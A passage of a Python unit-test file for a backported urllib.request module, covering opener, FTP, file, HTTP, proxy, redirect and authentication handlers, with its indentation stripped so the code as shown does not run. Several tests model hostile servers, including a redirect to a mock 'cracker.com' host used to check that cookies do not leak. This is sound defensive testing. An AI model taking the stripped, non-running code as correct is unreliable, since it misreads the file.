meth_spec = [
[("http_open", "raise")],
[("http_open", "return self")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://example.com/")
self.assertRaises(urllib_error.URLError, o.open, req)
self.assertEqual(o.calls, [(handlers[0], "http_open", (req,), {})])
def test_http_error(self):
# XXX http_error_default
# http errors are a special case
o = OpenerDirector()
meth_spec = [
[("http_open", "error 302")],
[("http_error_400", "raise"), "http_open"],
[("http_error_302", "return response"), "http_error_303",
"http_error"],
[("http_error_302")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
class Unknown(object):
def __eq__(self, other): return True
req = Request("http://example.com/")
o.open(req)
assert len(o.calls) == 2
calls = [(handlers[0], "http_open", (req,)),
(handlers[2], "http_error_302",
(req, Unknown(), 302, "", {}))]
for expected, got in zip(calls, o.calls):
handler, method_name, args = expected
self.assertEqual((handler, method_name), got[:2])
self.assertEqual(args, got[2])
def test_processors(self):
# *_request / *_response methods get called appropriately
o = OpenerDirector()
meth_spec = [
[("http_request", "return request"),
("http_response", "return response")],
[("http_request", "return request"),
("http_response", "return response")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://example.com/")
o.open(req)
# processor methods are called on *all* handlers that define them,
# not just the first handler that handles the request
calls = [
(handlers[0], "http_request"), (handlers[1], "http_request"),
(handlers[0], "http_response"), (handlers[1], "http_response")]
for i, (handler, name, args, kwds) in enumerate(o.calls):
if i < 2:
# *_request
self.assertEqual((handler, name), calls[i])
self.assertEqual(len(args), 1)
self.assertIsInstance(args[0], Request)
else:
# *_response
self.assertEqual((handler, name), calls[i])
self.assertEqual(len(args), 2)
self.assertIsInstance(args[0], Request)
# response from opener.open is None, because there's no
# handler that defines http_open to handle it
self.assertTrue(args[1] is None or
isinstance(args[1], MockResponse))
def test_method_deprecations(self):
req = Request("http://www.example.com")
with self.assertWarns(DeprecationWarning):
req.add_data("data")
with self.assertWarns(DeprecationWarning):
req.get_data()
with self.assertWarns(DeprecationWarning):
req.has_data()
with self.assertWarns(DeprecationWarning):
req.get_host()
with self.assertWarns(DeprecationWarning):
req.get_selector()
with self.assertWarns(DeprecationWarning):
req.is_unverifiable()
with self.assertWarns(DeprecationWarning):
req.get_origin_req_host()
with self.assertWarns(DeprecationWarning):
req.get_type()
def sanepathname2url(path):
try:
path.encode("utf-8")
except UnicodeEncodeError:
raise unittest.SkipTest("path is not encodable to utf8")
urlpath = urllib_request.pathname2url(path)
if os.name == "nt" and urlpath.startswith("///"):
urlpath = urlpath[2:]
# XXX don't ask me about the mac...
return urlpath
class HandlerTests(unittest.TestCase):
def test_ftp(self):
class MockFTPWrapper(object):
def __init__(self, data): self.data = data
def retrfile(self, filename, filetype):
self.filename, self.filetype = filename, filetype
return io.StringIO(self.data), len(self.data)
def close(self): pass
class NullFTPHandler(urllib_request.FTPHandler):
def __init__(self, data): self.data = data
def connect_ftp(self, user, passwd, host, port, dirs,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
self.user, self.passwd = user, passwd
self.host, self.port = host, port
self.dirs = dirs
self.ftpwrapper = MockFTPWrapper(self.data)
return self.ftpwrapper
import ftplib
data = "rheum rhaponicum"
h = NullFTPHandler(data)
h.parent = MockOpener()
for url, host, port, user, passwd, type_, dirs, filename, mimetype in [
("ftp://localhost/foo/bar/baz.html",
"localhost", ftplib.FTP_PORT, "", "", "I",
["foo", "bar"], "baz.html", "text/html"),
("ftp://parrot@localhost/foo/bar/baz.html",
"localhost", ftplib.FTP_PORT, "parrot", "", "I",
["foo", "bar"], "baz.html", "text/html"),
("ftp://%25parrot@localhost/foo/bar/baz.html",
"localhost", ftplib.FTP_PORT, "%parrot", "", "I",
["foo", "bar"], "baz.html", "text/html"),
("ftp://%2542parrot@localhost/foo/bar/baz.html",
"localhost", ftplib.FTP_PORT, "%42parrot", "", "I",
["foo", "bar"], "baz.html", "text/html"),
("ftp://localhost:80/foo/bar/",
"localhost", 80, "", "", "D",
["foo", "bar"], "", None),
("ftp://localhost/baz.gif;type=a",
"localhost", ftplib.FTP_PORT, "", "", "A",
[], "baz.gif", None), # XXX really this should guess image/gif
]:
req = Request(url)
req.timeout = None
r = h.ftp_open(req)
# ftp authentication not yet implemented by FTPHandler
self.assertEqual(h.user, user)
self.assertEqual(h.passwd, passwd)
self.assertEqual(h.host, socket.gethostbyname(host))
self.assertEqual(h.port, port)
self.assertEqual(h.dirs, dirs)
self.assertEqual(h.ftpwrapper.filename, filename)
self.assertEqual(h.ftpwrapper.filetype, type_)
headers = r.info()
self.assertEqual(headers.get("Content-type"), mimetype)
self.assertEqual(int(headers["Content-length"]), len(data))
def test_file(self):
import future.backports.email.utils as email_utils
import socket
h = urllib_request.FileHandler()
o = h.parent = MockOpener()
TESTFN = support.TESTFN
urlpath = sanepathname2url(os.path.abspath(TESTFN))
towrite = b"hello, world\n"
urls = [
"file://localhost%s" % urlpath,
"file://%s" % urlpath,
"file://%s%s" % (socket.gethostbyname('localhost'), urlpath),
]
try:
localaddr = socket.gethostbyname(socket.gethostname())
except socket.gaierror:
localaddr = ''
if localaddr:
urls.append("file://%s%s" % (localaddr, urlpath))
for url in urls:
f = open(TESTFN, "wb")
try:
try:
f.write(towrite)
finally:
f.close()
r = h.file_open(Request(url))
try:
data = r.read()
headers = r.info()
respurl = r.geturl()
finally:
r.close()
stats = os.stat(TESTFN)
modified = email_utils.formatdate(stats.st_mtime, usegmt=True)
finally:
os.remove(TESTFN)
self.assertEqual(data, towrite)
self.assertEqual(headers["Content-type"], "text/plain")
self.assertEqual(headers["Content-length"], "13")
self.assertEqual(headers["Last-modified"], modified)
self.assertEqual(respurl, url)
for url in [
"file://localhost:80%s" % urlpath,
"file:///file_does_not_exist.txt",
"file://%s:80%s/%s" % (socket.gethostbyname('localhost'),
os.getcwd(), TESTFN),
"file://somerandomhost.ontheinternet.com%s/%s" %
(os.getcwd(), TESTFN),
]:
try:
f = open(TESTFN, "wb")
try:
f.write(towrite)
finally:
f.close()
self.assertRaises(urllib_error.URLError,
h.file_open, Request(url))
finally:
os.remove(TESTFN)
h = urllib_request.FileHandler()
o = h.parent = MockOpener()
# XXXX why does // mean ftp (and /// mean not ftp!), and where
# is file: scheme specified? I think this is really a bug, and
# what was intended was to distinguish between URLs like:
# file:/blah.txt (a file)
# file://localhost/blah.txt (a file)
# file:///blah.txt (a file)
# file://ftp.example.com/blah.txt (an ftp URL)
for url, ftp in [
("file://ftp.example.com//foo.txt", False),
("file://ftp.example.com///foo.txt", False),
# XXXX bug: fails with OSError, should be URLError
("file://ftp.example.com/foo.txt", False),
("file://somehost//foo/something.txt", False),
("file://localhost//foo/something.txt", False),
]:
req = Request(url)
try:
h.file_open(req)
# XXXX remove OSError when bug fixed
except (urllib_error.URLError, OSError):
self.assertFalse(ftp)
else:
self.assertIs(o.req, req)
self.assertEqual(req.type, "ftp")
self.assertEqual(req.type == "ftp", ftp)
def test_http(self):
h = urllib_request.AbstractHTTPHandler()
o = h.parent = MockOpener()
url = "http://example.com/"
for method, data in [("GET", None), ("POST", b"blah")]:
req = Request(url, data, {"Foo": "bar"})
req.timeout = None
req.add_unredirected_header("Spam", "eggs")
http = MockHTTPClass()
r = h.do_open(http, req)
# result attributes
r.read; r.readline # wrapped MockFile methods
r.info; r.geturl # addinfourl methods
r.code, r.msg == 200, "OK" # added from MockHTTPClass.getreply()
hdrs = r.info()
hdrs.get; hdrs.__contains__ # r.info() gives dict from .getreply()
self.assertEqual(r.geturl(), url)
self.assertEqual(http.host, "example.com")
self.assertEqual(http.level, 0)
self.assertEqual(http.method, method)
self.assertEqual(http.selector, "/")
self.assertEqual(http.req_headers,
[("Connection", "close"),
("Foo", "bar"), ("Spam", "eggs")])
self.assertEqual(http.data, data)
# check socket.error converted to URLError
http.raise_on_endheaders = True
self.assertRaises(urllib_error.URLError, h.do_open, http, req)
# Check for TypeError on POST data which is str.
req = Request("http://example.com/","badpost")
self.assertRaises(TypeError, h.do_request_, req)
# check adding of standard headers
o.addheaders = [("Spam", "eggs")]
for data in b"", None: # POST, GET
req = Request("http://example.com/", data)
r = MockResponse(200, "OK", {}, "")
newreq = h.do_request_(req)
if data is None: # GET
self.assertNotIn("Content-length", req.unredirected_hdrs)
self.assertNotIn("Content-type", req.unredirected_hdrs)
else: # POST
self.assertEqual(req.unredirected_hdrs["Content-length"], "0")
self.assertEqual(req.unredirected_hdrs["Content-type"],
"application/x-www-form-urlencoded")
# XXX the details of Host could be better tested
self.assertEqual(req.unredirected_hdrs["Host"], "example.com")
self.assertEqual(req.unredirected_hdrs["Spam"], "eggs")
# don't clobber existing headers
req.add_unredirected_header("Content-length", "foo")
req.add_unredirected_header("Content-type", "bar")
req.add_unredirected_header("Host", "baz")
req.add_unredirected_header("Spam", "foo")
newreq = h.do_request_(req)
self.assertEqual(req.unredirected_hdrs["Content-length"], "foo")
self.assertEqual(req.unredirected_hdrs["Content-type"], "bar")
self.assertEqual(req.unredirected_hdrs["Host"], "baz")
self.assertEqual(req.unredirected_hdrs["Spam"], "foo")
# Check iterable body support
def iterable_body():
yield b"one"
yield b"two"
yield b"three"
for headers in {}, {"Content-Length": 11}:
req = Request("http://example.com/", iterable_body(), headers)
if not headers:
# Having an iterable body without a Content-Length should
# raise an exception
self.assertRaises(ValueError, h.do_request_, req)
else:
newreq = h.do_request_(req)
# A file object.
# Test only Content-Length attribute of request.
file_obj = io.BytesIO()
file_obj.write(b"Something\nSomething\nSomething\n")
for headers in {}, {"Content-Length": 30}:
req = Request("http://example.com/", file_obj, headers)
if not headers:
# Having an iterable body without a Content-Length should
# raise an exception
self.assertRaises(ValueError, h.do_request_, req)
else:
newreq = h.do_request_(req)
self.assertEqual(int(newreq.get_header('Content-length')),30)
file_obj.close()
# array.array Iterable - Content Length is calculated
iterable_array = array.array(text_to_native_str("I"),
[1,2,3,4])
for headers in {}, {"Content-Length": 16}:
req = Request("http://example.com/", iterable_array, headers)
newreq = h.do_request_(req)
self.assertEqual(int(newreq.get_header('Content-length')),16)
def test_http_doubleslash(self):
# Checks the presence of any unnecessary double slash in url does not
# break anything. Previously, a double slash directly after the host
# could cause incorrect parsing.
h = urllib_request.AbstractHTTPHandler()
h.parent = MockOpener()
data = b""
ds_urls = [
"http://example.com/foo/bar/baz.html",
"http://example.com//foo/bar/baz.html",
"http://example.com/foo//bar/baz.html",
"http://example.com/foo/bar//baz.html"
]
for ds_url in ds_urls:
ds_req = Request(ds_url, data)
# Check whether host is determined correctly if there is no proxy
np_ds_req = h.do_request_(ds_req)
self.assertEqual(np_ds_req.unredirected_hdrs["Host"],"example.com")
# Check whether host is determined correctly if there is a proxy
ds_req.set_proxy("someproxy:3128",None)
p_ds_req = h.do_request_(ds_req)
self.assertEqual(p_ds_req.unredirected_hdrs["Host"],"example.com")
def test_fixpath_in_weirdurls(self):
# Issue4493: urllib2 to supply '/' when to urls where path does not
# start with'/'
h = urllib_request.AbstractHTTPHandler()
h.parent = MockOpener()
weird_url = 'http://www.python.org?getspam'
req = Request(weird_url)
newreq = h.do_request_(req)
self.assertEqual(newreq.host,'www.python.org')
self.assertEqual(newreq.selector,'/?getspam')
url_without_path = 'http://www.python.org'
req = Request(url_without_path)
newreq = h.do_request_(req)
self.assertEqual(newreq.host,'www.python.org')
self.assertEqual(newreq.selector,'')
def test_errors(self):
h = urllib_request.HTTPErrorProcessor()
o = h.parent = MockOpener()
url = "http://example.com/"
req = Request(url)
# all 2xx are passed through
r = MockResponse(200, "OK", {}, "", url)
newr = h.http_response(req, r)
self.assertIs(r, newr)
self.assertFalse(hasattr(o, "proto")) # o.error not called
r = MockResponse(202, "Accepted", {}, "", url)
newr = h.http_response(req, r)
self.assertIs(r, newr)
self.assertFalse(hasattr(o, "proto")) # o.error not called
r = MockResponse(206, "Partial content", {}, "", url)
newr = h.http_response(req, r)
self.assertIs(r, newr)
self.assertFalse(hasattr(o, "proto")) # o.error not called
# anything else calls o.error (and MockOpener returns None, here)
r = MockResponse(502, "Bad gateway", {}, "", url)
self.assertIsNone(h.http_response(req, r))
self.assertEqual(o.proto, "http") # o.error called
self.assertEqual(o.args, (req, r, 502, "Bad gateway", {}))
def test_cookies(self):
cj = MockCookieJar()
h = urllib_request.HTTPCookieProcessor(cj)
h.parent = MockOpener()
req = Request("http://example.com/")
r = MockResponse(200, "OK", {}, "")
newreq = h.http_request(req)
self.assertIs(cj.ach_req, req)
self.assertIs(cj.ach_req, newreq)
self.assertEqual(req.origin_req_host, "example.com")
self.assertFalse(req.unverifiable)
newr = h.http_response(req, r)
self.assertIs(cj.ec_req, req)
self.assertIs(cj.ec_r, r)
self.assertIs(r, newr)
def test_redirect(self):
from_url = "http://example.com/a.html"
to_url = "http://example.com/b.html"
h = urllib_request.HTTPRedirectHandler()
o = h.parent = MockOpener()
# ordinary redirect behaviour
for code in 301, 302, 303, 307:
for data in None, "blah\nblah\n":
method = getattr(h, "http_error_%s" % code)
req = Request(from_url, data)
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
req.add_header("Nonsense", "viking=withhold")
if data is not None:
req.add_header("Content-Length", str(len(data)))
req.add_unredirected_header("Spam", "spam")
try:
method(req, MockFile(), code, "Blah",
MockHeaders({"location": to_url}))
except urllib_error.HTTPError:
# 307 in response to POST requires user OK
self.assertTrue(code == 307 and data is not None)
self.assertEqual(o.req.get_full_url(), to_url)
try:
self.assertEqual(o.req.get_method(), "GET")
except AttributeError:
self.assertFalse(o.req.data)
# now it's a GET, there should not be headers regarding content
# (possibly dragged from before being a POST)
headers = [x.lower() for x in o.req.headers]
self.assertNotIn("content-length", headers)
self.assertNotIn("content-type", headers)
self.assertEqual(o.req.headers["Nonsense"],
"viking=withhold")
self.assertNotIn("Spam", o.req.headers)
self.assertNotIn("Spam", o.req.unredirected_hdrs)
# loop detection
req = Request(from_url)
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
def redirect(h, req, url=to_url):
h.http_error_302(req, MockFile(), 302, "Blah",
MockHeaders({"location": url}))
# Note that the *original* request shares the same record of
# redirections with the sub-requests caused by the redirections.
# detect infinite loop redirect of a URL to itself
req = Request(from_url, origin_req_host="example.com")
count = 0
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
try:
while 1:
redirect(h, req, "http://example.com/")
count = count + 1
except urllib_error.HTTPError:
# don't stop until max_repeats, because cookies may introduce state
self.assertEqual(count, urllib_request.HTTPRedirectHandler.max_repeats)
# detect endless non-repeating chain of redirects
req = Request(from_url, origin_req_host="example.com")
count = 0
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
try:
while 1:
redirect(h, req, "http://example.com/%d" % count)
count = count + 1
except urllib_error.HTTPError:
self.assertEqual(count,
urllib_request.HTTPRedirectHandler.max_redirections)
def test_invalid_redirect(self):
from_url = "http://example.com/a.html"
valid_schemes = ['http','https','ftp']
invalid_schemes = ['file','imap','ldap']
schemeless_url = "example.com/b.html"
h = urllib_request.HTTPRedirectHandler()
o = h.parent = MockOpener()
req = Request(from_url)
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
for scheme in invalid_schemes:
invalid_url = scheme + '://' + schemeless_url
self.assertRaises(urllib_error.HTTPError, h.http_error_302,
req, MockFile(), 302, "Security Loophole",
MockHeaders({"location": invalid_url}))
for scheme in valid_schemes:
valid_url = scheme + '://' + schemeless_url
h.http_error_302(req, MockFile(), 302, "That's fine",
MockHeaders({"location": valid_url}))
self.assertEqual(o.req.get_full_url(), valid_url)
def test_relative_redirect(self):
from future.backports.urllib import parse as urllib_parse
from_url = "http://example.com/a.html"
relative_url = "/b.html"
h = urllib_request.HTTPRedirectHandler()
o = h.parent = MockOpener()
req = Request(from_url)
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
valid_url = urllib_parse.urljoin(from_url,relative_url)
h.http_error_302(req, MockFile(), 302, "That's fine",
MockHeaders({"location": valid_url}))
self.assertEqual(o.req.get_full_url(), valid_url)
def test_cookie_redirect(self):
# cookies shouldn't leak into redirected requests
from future.backports.http.cookiejar import CookieJar
from future.tests.test_http_cookiejar import interact_netscape
cj = CookieJar()
interact_netscape(cj, "http://www.example.com/", "spam=eggs")
hh = MockHTTPHandler(302, "Location: http://www.cracker.com/\r\n\r\n")
hdeh = urllib_request.HTTPDefaultErrorHandler()
hrh = urllib_request.HTTPRedirectHandler()
cp = urllib_request.HTTPCookieProcessor(cj)
o = build_test_opener(hh, hdeh, hrh, cp)
o.open("http://www.example.com/")
self.assertFalse(hh.req.has_header("Cookie"))
def test_redirect_fragment(self):
redirected_url = 'http://www.example.com/index.html#OK\r\n\r\n'
hh = MockHTTPHandler(302, 'Location: ' + redirected_url)
hdeh = urllib_request.HTTPDefaultErrorHandler()
hrh = urllib_request.HTTPRedirectHandler()
o = build_test_opener(hh, hdeh, hrh)
fp = o.open('http://www.example.com')
self.assertEqual(fp.geturl(), redirected_url.strip())
def test_proxy(self):
o = OpenerDirector()
ph = urllib_request.ProxyHandler(dict(http="proxy.example.com:3128"))
o.add_handler(ph)
meth_spec = [
[("http_open", "return response")]
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://acme.example.com/")
self.assertEqual(req.host, "acme.example.com")
o.open(req)
self.assertEqual(req.host, "proxy.example.com:3128")
self.assertEqual([(handlers[0], "http_open")],
[tup[0:2] for tup in o.calls])
def test_proxy_no_proxy(self):
os.environ['no_proxy'] = 'python.org'
o = OpenerDirector()
ph = urllib_request.ProxyHandler(dict(http="proxy.example.com"))
o.add_handler(ph)
req = Request("http://www.perl.org/")
self.assertEqual(req.host, "www.perl.org")
o.open(req)
self.assertEqual(req.host, "proxy.example.com")
req = Request("http://www.python.org")
self.assertEqual(req.host, "www.python.org")
o.open(req)
self.assertEqual(req.host, "www.python.org")
del os.environ['no_proxy']
def test_proxy_no_proxy_all(self):
os.environ['no_proxy'] = '*'
o = OpenerDirector()
ph = urllib_request.ProxyHandler(dict(http="proxy.example.com"))
o.add_handler(ph)
req = Request("http://www.python.org")
self.assertEqual(req.host, "www.python.org")
o.open(req)
self.assertEqual(req.host, "www.python.org")
del os.environ['no_proxy']
def test_proxy_https(self):
o = OpenerDirector()
ph = urllib_request.ProxyHandler(dict(https="proxy.example.com:3128"))
o.add_handler(ph)
meth_spec = [
[("https_open", "return response")]
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("https://www.example.com/")
self.assertEqual(req.host, "www.example.com")
o.open(req)
self.assertEqual(req.host, "proxy.example.com:3128")
self.assertEqual([(handlers[0], "https_open")],
[tup[0:2] for tup in o.calls])
def test_proxy_https_proxy_authorization(self):
o = OpenerDirector()
ph = urllib_request.ProxyHandler(dict(https='proxy.example.com:3128'))
o.add_handler(ph)
https_handler = MockHTTPSHandler()
o.add_handler(https_handler)
req = Request("https://www.example.com/")
req.add_header("Proxy-Authorization","FooBar")
req.add_header("User-Agent","Grail")
self.assertEqual(req.host, "www.example.com")
self.assertIsNone(req._tunnel_host)
o.open(req)
# Verify Proxy-Authorization gets tunneled to request.
# httpsconn req_headers do not have the Proxy-Authorization header but
# the req will have.
self.assertNotIn(("Proxy-Authorization","FooBar"),
https_handler.httpconn.req_headers)
self.assertIn(("User-Agent","Grail"),
https_handler.httpconn.req_headers)
self.assertIsNotNone(req._tunnel_host)
self.assertEqual(req.host, "proxy.example.com:3128")
self.assertEqual(req.get_header("Proxy-authorization"),"FooBar")
# TODO: This should be only for OSX
@unittest.skipUnless(sys.platform == 'darwin', "only relevant for OSX")
def test_osx_proxy_bypass(self):
bypass = {
'exclude_simple': False,
'exceptions': ['foo.bar', '*.bar.com', '127.0.0.1', '10.10',
'10.0/16']
}
# Check hosts that should trigger the proxy bypass
for host in ('foo.bar', 'www.bar.com', '127.0.0.1', '10.10.0.1',
'10.0.0.1'):
self.assertTrue(_proxy_bypass_macosx_sysconf(host, bypass),
'expected bypass of %s to be True' % host)
# Check hosts that should not trigger the proxy bypass
for host in ('abc.foo.bar', 'bar.com', '127.0.0.2', '10.11.0.1', 'test'):
self.assertFalse(_proxy_bypass_macosx_sysconf(host, bypass),
'expected bypass of %s to be False' % host)
# Check the exclude_simple flag
bypass = {'exclude_simple': True, 'exceptions': []}
self.assertTrue(_proxy_bypass_macosx_sysconf('test', bypass))
def test_basic_auth(self, quote_char='"'):
opener = OpenerDirector()
password_manager = MockPasswordManager()
auth_handler = urllib_request.HTTPBasicAuthHandler(password_manager)
realm = "ACME Widget Store"
http_handler = MockHTTPHandler(
401, 'WWW-Authenticate: Basic realm=%s%s%s\r\n\r\n' %
(quote_char, realm, quote_char) )
opener.add_handler(auth_handler)
opener.add_handler(http_handler)
self._test_basic_auth(opener, auth_handler, "Authorization",
realm, http_handler, password_manager,
"http://acme.example.com/protected",
"http://acme.example.com/protected",
)
def test_basic_auth_with_single_quoted_realm(self):
self.test_basic_auth(quote_char="'")
def test_basic_auth_with_unquoted_realm(self):
opener = OpenerDirector()
password_manager = MockPasswordManager()
auth_handler = urllib_request.HTTPBasicAuthHandler(password_manager)
realm = "ACME Widget Store"
http_handler = MockHTTPHandler(
401, 'WWW-Authenticate: Basic realm=%s\r\n\r\n' % realm)
opener.add_handler(auth_handler)
opener.add_handler(http_handler)
with self.assertWarns(UserWarning):
self._test_basic_auth(opener, auth_handler, "Authorization",
realm, http_handler, password_manager,
"http://acme.example.com/protected",
"http://acme.example.com/protected",
)
def test_proxy_basic_auth(self):
opener = OpenerDirector()
ph = urllib_request.ProxyHandler(dict(http="proxy.example.com:3128"))
opener.add_handler(ph)
password_manager = MockPasswordManager()
auth_handler = urllib_request.ProxyBasicAuthHandler(password_manager)
realm = "ACME Networks"
http_handler = MockHTTPHandler(
407, 'Proxy-Authenticate: Basic realm="%s"\r\n\r\n' % realm)
opener.add_handler(auth_handler)
opener.add_handler(http_handler)
self._test_basic_auth(opener, auth_handler, "Proxy-authorization",
realm, http_handler, password_manager,
"http://acme.example.com:3128/protected",
"proxy.example.com:3128",
)
def test_basic_and_digest_auth_handlers(self):
# HTTPDigestAuthHandler raised an exception if it couldn't handle a 40*
# response (http://python.org/sf/1479302), where it should instead
# return None to allow another handler (especially
# HTTPBasicAuthHandler) to handle the response.
# Also (http://python.org/sf/14797027, RFC 2617 section 1.2), we must
# try digest first (since it's the strongest auth scheme), so we record
# order of calls here to check digest comes first:
class RecordingOpenerDirector(OpenerDirector):
def __init__(self):
OpenerDirector.__init__(self)
self.recorded = []
def record(self, info):
self.recorded.append(info)
class TestDigestAuthHandler(urllib_request.HTTPDigestAuthHandler):
def http_error_401(self, *args, **kwds):
self.parent.record("digest")
urllib_request.HTTPDigestAuthHandler.http_error_401(self,
*args, **kwds)
class TestBasicAuthHandler(urllib_request.HTTPBasicAuthHandler):
def http_error_401(self, *args, **kwds):
self.parent.record("basic")
urllib_request.HTTPBasicAuthHandler.http_error_401(self,
*args, **kwds)
opener = RecordingOpenerDirector()
password_manager = MockPasswordManager()
digest_handler = TestDigestAuthHandler(password_manager)
basic_handler = TestBasicAuthHandler(password_manager)
realm = "ACME Networks"
http_handler = MockHTTPHandler(
401, 'WWW-Authenticate: Basic realm="%s"\r\n\r\n' % realm)
opener.add_handler(basic_handler)
opener.add_handler(digest_handler)
opener.add_handler(http_handler)
# check basic auth isn't blocked by digest handler failing
self._test_basic_auth(opener, basic_handler, "Authorization",
realm, http_handler, password_manager,
"http://acme.example.com/protected",
"http://acme.example.com/protected",
)
# check digest was tried before basic (twice, because
# _test_basic_auth called .open() twice)
self.assertEqual(opener.recorded, ["digest", "basic"]*2)
def test_unsupported_auth_digest_handler(self):
opener = OpenerDirector()
# While using DigestAuthHandler
digest_auth_handler = urllib_request.HTTPDigestAuthHandler(None)
http_handler = MockHTTPHandler(
401, 'WWW-Authenticate: Kerberos\r\n\r\n')
opener.add_handler(digest_auth_handler)
opener.add_handler(http_handler)
self.assertRaises(ValueError,opener.open,"http://www.example.com")
def test_unsupported_auth_basic_handler(self):
# While using BasicAuthHandler
opener = OpenerDirector()
basic_auth_handler = urllib_request.HTTPBasicAuthHandler(None)
http_handler = MockHTTPHandler(
401, 'WWW-Authenticate: NTLM\r\n\r\n')
opener.add_handler(basic_auth_handler)
opener.add_handler(http_handler)
self.assertRaises(ValueError,opener.open,"http://www.example.com")
def _test_basic_auth(self, opener, auth_handler, auth_header,
realm, http_handler, password_manager,
request_url, protected_url):
import base64
user, password = "wile", "coyote"
# .add_password() fed through to password manager
auth_handler.add_password(realm, request_url, user, password)
self.assertEqual(realm, password_manager.realm)
self.assertEqual(request_url, password_manager.url)
self.assertEqual(user, password_manager.user)
self.assertEqual(password, password_manager.password)
opener.open(request_url)
# should have asked the password manager for the username/password
self.assertEqual(password_manager.target_realm, realm)
self.assertEqual(password_manager.target_url, protected_url)
# expect one request without authorization, then one with
self.assertEqual(len(http_handler.requests), 2)
self.assertFalse(http_handler.requests[0].has_header(auth_header))
userpass = bytes('%s:%s' % (user, password), "ascii")
auth_hdr_value = ('Basic ' +
base64.encodebytes(userpass).strip().decode())
self.assertEqual(http_handler.requests[1].get_header(auth_header),
auth_hdr_value)
self.assertEqual(http_handler.requests[1].unredirected_hdrs[auth_header],
auth_hdr_value)
# if the password manager can't find a password, the handler won't
# handle the HTTP auth error
password_manager.user = password_manager.password = None
http_handler.reset()
opener.open(request_url)
self.assertEqual(len(http_handler.requests), 1)
self.assertFalse(http_handler.requests[0].has_header(auth_header))
class MiscTests(unittest.TestCase):
def opener_has_handler(self, opener, handler_class):
self.assertTrue(any(h.__class__ == handler_class
for h in opener.handlers))
def test_build_opener(self):
class MyHTTPHandler(urllib_request.HTTPHandler): pass
class FooHandler(urllib_request.BaseHandler):
def foo_open(self): pass
class BarHandler(urllib_request.BaseHandler):
def bar_open(self): pass
build_opener = urllib_request.build_opener
o = build_opener(FooHandler, BarHandler)
self.opener_has_handler(o, FooHandler)
self.opener_has_handler(o, BarHandler)
# can take a mix of classes and instances
o = build_opener(FooHandler, BarHandler())
self.opener_has_handler(o, FooHandler)
self.opener_has_handler(o, BarHandler)
# subclasses of default handlers override default handlers
o = build_opener(MyHTTPHandler)
self.opener_has_handler(o, MyHTTPHandler)
# a particular case of overriding: default handlers can be passed
# in explicitly
o = build_opener()
self.opener_has_handler(o, urllib_request.HTTPHandler)
o = build_opener(urllib_request.HTTPHandler)
self.opener_has_handler(o, urllib_request.HTTPHandler)
o = build_opener(urllib_request.HTTPHandler())
self.opener_has_handler(o, urllib_request.HTTPHandler)
# Issue2670: multiple handlers sharing the same base class
class MyOtherHTTPHandler(urllib_request.HTTPHandler): pass
o = build_opener(MyHTTPHandler, MyOtherHTTPHandler)
self.opener_has_handler(o, MyHTTPHandler)
self.opener_has_handler(o, MyOtherHTTPHandler)
def test_HTTPError_interface(self):
"""
Issue 13211 reveals that HTTPError didn't implement the URLError
interface even though HTTPError is a subclass of URLError.
"""
msg = 'something bad happened'
url = code = fp = None
hdrs = 'Content-Length: 42'
err = urllib_error.HTTPError(url, code, msg, hdrs, fp)
self.assertTrue(hasattr(err, 'reason'))
self.assertEqual(err.reason, 'something bad happened')
self.assertTrue(hasattr(err, 'hdrs'))
self.assertEqual(err.hdrs, 'Content-Length: 42')
expected_errmsg = 'HTTP Error %s: %s' % (err.code, err.msg)
self.assertEqual(str(err), expected_errmsg)
class RequestTests(unittest.TestCase):
def setUp(self):
self.get = Request("http://www.python.org/~jeremy/")
self.post = Request("http://www.python.org/~jeremy/",
"data",
headers={"X-Test": "test"})
def test_method(self):
self.assertEqual("POST", self.post.get_method())
self.assertEqual("GET", self.get.get_method())
def test_data(self):
self.assertFalse(self.get.data)
self.assertEqual("GET", self.get.get_method())
self.get.data = "spam"
self.assertTrue(self.get.data)
self.assertEqual("POST", self.get.get_method())
def test_get_full_url(self):
self.assertEqual("http://www.python.org/~jeremy/",
self.get.get_full_url())
def test_selector(self):
self.assertEqual("/~jeremy/", self.get.selector)
req = Request("http://www.python.org/")
self.assertEqual("/", req.selector)
def test_get_type(self):
self.assertEqual("http", self.get.type)
def test_get_host(self):
self.assertEqual("www.python.org", self.get.host)
def test_get_host_unquote(self):
req = Request("http://www.%70ython.org/")
self.assertEqual("www.python.org", req.host)
def test_proxy(self):
self.assertFalse(self.get.has_proxy())
self.get.set_proxy("www.perl.org", "http")
self.assertTrue(self.get.has_proxy())
self.assertEqual("www.python.org", self.get.origin_req_host)
self.assertEqual("www.perl.org", self.get.host)
def test_wrapped_url(self):
req = Request("<URL:http://www.python.org>")
self.assertEqual("www.python.org", req.host)
def test_url_fragment(self):
req = Request("http://www.python.org/?qs=query#fragment=true")
self.assertEqual("/?qs=query", req.selector)
req = Request("http://www.python.org/#fun=true")
self.assertEqual("/", req.selector)
# Issue 11703: geturl() omits fragment in the original URL.
url = 'http://docs.python.org/library/urllib2.html#OK'
req = Request(url)
self.assertEqual(req.get_full_url(), url)
def test_HTTPError_interface_call(self):
"""
Issue 15701 - HTTPError interface has info method available from URLError
"""
err = urllib_request.HTTPError(msg="something bad happened", url=None,
code=None, hdrs='Content-Length:42', fp=None)
self.assertTrue(hasattr(err, 'reason'))
assert hasattr(err, 'reason')
assert hasattr(err, 'info')
assert callable(err.info)
try:
err.info()
except AttributeError:
self.fail('err.info call failed.')
self.assertEqual(err.info(), "Content-Length:42")
def test_main(verbose=None):
# support.run_doctest(test_urllib2, verbose)
# support.run_doctest(urllib_request, verbose)
tests = (TrivialTests,
OpenerDirectorTests,
HandlerTests,
MiscTests,
RequestTests,
RequestHdrsTests)
support.run_unittest(*tests)
if __name__ == "__main__":
unittest.main()
| [
"ed@pythoncharmers.com"
] | ed@pythoncharmers.com |
